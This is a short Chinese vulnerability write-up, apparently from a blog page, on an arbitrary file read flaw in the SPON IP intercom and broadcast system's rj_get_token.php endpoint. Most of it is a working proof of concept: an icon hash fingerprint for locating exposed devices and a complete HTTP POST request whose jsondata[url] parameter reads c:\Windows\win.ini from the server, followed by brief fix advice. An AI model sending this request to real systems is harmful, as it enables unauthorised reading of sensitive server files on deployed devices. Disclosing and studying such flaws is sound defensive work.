世邦通信SPON IP网络对讲广播系统rj_get_token.php 任意文件读取漏洞

产品介绍

世邦通信SPON IP网络对讲广播系统采用领先的IPAudio™技术,将音频信号以数据包形式在局域网和广域网上进行传送,是一套纯数字传输系统。

漏洞描述

spon IP网络对讲广播系统rj_get_token.php存在任意文件读取漏洞,攻击者可通过该漏洞在服务器端读取任意敏感文件。

资产测绘

icon_hash="-1830859634"

漏洞复现

ruby 复制代码
POST /php/rj_get_token.php HTTP/1.1
Host: your_ip
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 32

jsondata[url]=c:\Windows\win.ini

读取win.ini配置文件内容

修复建议

1、升级至最新安全版本。

2、限制接口访问。

相关推荐
Johny_Zhao4 分钟前
基于CentOS Stream 8的物联网平台深度优化方案
linux·网络·网络安全·信息安全·云计算·shell·yum源·系统运维
Li_yizYa12 小时前
网络原理 | TCP协议的常见核心机制
网络·网络协议·tcp/ip
Micro麦可乐12 小时前
最新Spring Security实战教程(十八)安全日志与审计:关键操作追踪与风险预警
java·spring boot·后端·安全·spring·安全审计
暮色_年华12 小时前
《TCP/IP协议卷1》第3章 IP协议
网络
galaxylove12 小时前
Gartner发布新的网络安全运营模型:决定安全运营的9个组件
网络·安全·web安全
HhhDreamof_12 小时前
安全生产台账系统
安全
90wunch13 小时前
更进一步深入的研究ObRegisterCallBack
c++·windows·安全
老六ip加速器13 小时前
获取ip地址安全吗?如何获取静态ip地址隔离ip
运维·网络·智能路由器
领世达检测V1335290924913 小时前
蓝牙戒指欧盟EN 18031网络安全认证详细解读
网络
王火火(DDoS CC防护)14 小时前
高防 IP 是如何帮助数藏行业防刷的
网络·网络协议·tcp/ip